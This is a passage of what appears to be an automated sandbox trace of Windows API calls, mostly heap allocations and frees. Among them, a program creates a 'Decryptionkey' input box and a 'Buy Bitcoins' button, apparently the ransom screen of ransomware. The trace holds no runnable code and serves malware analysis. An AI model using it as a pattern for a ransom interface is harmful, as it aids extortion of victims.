RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.550] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.550] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe526e0 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.551] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526e0 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.551] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.551] GetDC (hWnd=0x0) returned 0xd010720 [0248.551] GetDeviceCaps (hdc=0xd010720, index=90) returned 96 [0248.551] ReleaseDC (hWnd=0x0, hDC=0xd010720) returned 1 [0248.551] CreateFontW (cHeight=-30, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x440a01d6 [0248.552] SendMessageW (hWnd=0x2016a, Msg=0x30, wParam=0x440a01d6, lParam=0x1) returned 0x0 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe526e0 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4170 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4128 | out: hHeap=0xbe0000) returned 1 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d850 | out: hHeap=0xbe0000) returned 1 [0248.552] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.552] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d850 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4128 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526e0 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4170 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.552] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.552] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53380 [0248.553] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53380 | out: hHeap=0xbe0000) returned 1 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1c) returned 0xe3d5a8 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa0) returned 0xd26e98 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a60 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53380 [0248.553] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf66a8 [0248.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526b0 [0248.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bc8 [0248.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526d0 [0248.554] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52760 [0248.554] CreateWindowExW (dwExStyle=0x200, lpClassName="edit", lpWindowName="Decryptionkey", dwStyle=0x50010080, X=304, Y=400, nWidth=305, nHeight=40, hWndParent=0x30150, hMenu=0x6, hInstance=0x290000, lpParam=0x0) returned 0x2015e [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 0 [0248.557] NtdllDialogWndProc_W () returned 0x0 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] GetWindowLongW (hWnd=0x2015e, nIndex=-21) returned 0 [0248.557] NtdllDialogWndProc_W () returned 0x0 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] NtdllDialogWndProc_W () returned 0x2 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] NtdllDialogWndProc_W () returned 0x3 [0248.557] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.557] NtdllDialogWndProc_W () returned 0x0 [0248.557] GetStockObject (i=17) returned 0x18a0025 [0248.557] SendMessageW (hWnd=0x2015e, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x1 [0248.558] GetClientRect (in: hWnd=0x2015e, lpRect=0x8bf488 | out: lpRect=0x8bf488) returned 1 [0248.558] GetWindowRect (in: hWnd=0x2015e, lpRect=0x8bf488 | out: lpRect=0x8bf488) returned 1 [0248.558] SetWindowLongW (hWnd=0x2015e, nIndex=-21, dwNewLong=6) returned 0 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.558] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.558] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.559] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.559] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.559] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6408 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b80 [0248.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.559] GetDC (hWnd=0x0) returned 0x270101c5 [0248.559] GetDeviceCaps (hdc=0x270101c5, index=90) returned 96 [0248.559] ReleaseDC (hWnd=0x0, hDC=0x270101c5) returned 1 [0248.559] CreateFontW (cHeight=-26, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Arial") returned 0xd0a01cf [0248.560] SendMessageW (hWnd=0x2015e, Msg=0x30, wParam=0xd0a01cf, lParam=0x1) returned 0x1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8b80 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6408 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.568] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.568] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 1 [0248.568] TranslateMessage (lpMsg=0x8bf904) returned 0 [0248.568] DispatchMessageW (lpMsg=0x8bf904) returned 0xffffffff [0248.568] GetForegroundWindow () returned 0x100f0 [0248.568] GetWindowLongW (hWnd=0x100f0, nIndex=-21) returned 0 [0248.568] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52750 [0248.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe53300 [0248.569] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe53300 | out: hHeap=0xbe0000) returned 1 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x1a) returned 0xe3d5a8 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0xa0) returned 0xea2ce0 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6408 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53300 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b80 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53340 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8b98 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe53390 [0248.569] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52720 [0248.570] CreateWindowExW (dwExStyle=0x100, lpClassName="button", lpWindowName="Buy Bitcoins", dwStyle=0x50010000, X=15, Y=400, nWidth=153, nHeight=41, hWndParent=0x30150, hMenu=0x7, hInstance=0x290000, lpParam=0x0) returned 0x2010a [0248.570] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.570] NtdllDialogWndProc_W () returned 0x2 [0248.570] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.570] NtdllDialogWndProc_W () returned 0x3 [0248.570] GetWindowLongW (hWnd=0x30150, nIndex=-21) returned 0 [0248.570] NtdllDialogWndProc_W () returned 0x0 [0248.571] GetStockObject (i=17) returned 0x18a0025 [0248.571] SendMessageW (hWnd=0x2010a, Msg=0x30, wParam=0x18a0025, lParam=0x0) returned 0x0 [0248.571] GetClientRect (in: hWnd=0x2010a, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.571] GetWindowRect (in: hWnd=0x2010a, lpRect=0x8bf470 | out: lpRect=0x8bf470) returned 1 [0248.571] SetWindowLongW (hWnd=0x2010a, nIndex=-21, dwNewLong=7) returned 0 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8a78 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d468 | out: hHeap=0xbe0000) returned 1 [0248.571] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52750 | out: hHeap=0xbe0000) returned 1 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d468 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8a78 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52750 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.571] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8928 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bf8 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4140 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.572] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41d0 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe533a0 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41e8 [0248.572] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52770 [0248.572] GetDC (hWnd=0x0) returned 0x270101c5 [0248.572] GetDeviceCaps (hdc=0x270101c5, index=90) returned 96 [0248.572] ReleaseDC (hWnd=0x0, hDC=0x270101c5) returned 1 [0248.572] CreateFontW (cHeight=-16, cWidth=0, cEscapement=0, cOrientation=0, cWeight=800, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x4, iClipPrecision=0x0, iQuality=0x2, iPitchAndFamily=0x0, pszFaceName="Calibri") returned 0x590a0617 [0248.573] SendMessageW (hWnd=0x2010a, Msg=0x30, wParam=0x590a0617, lParam=0x1) returned 0x0 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41e8 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41d0 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe533a0 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8928 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bf8 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4140 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4008 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf6648 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf8bb0 | out: hHeap=0xbe0000) returned 1 [0248.573] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5a8 | out: hHeap=0xbe0000) returned 1 [0248.573] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe533a0 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5a8 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf8bb0 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52770 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf6648 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52710 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x18) returned 0xe40af0 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4008 [0248.573] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe526f0 [0248.573] RtlAllocateHeap 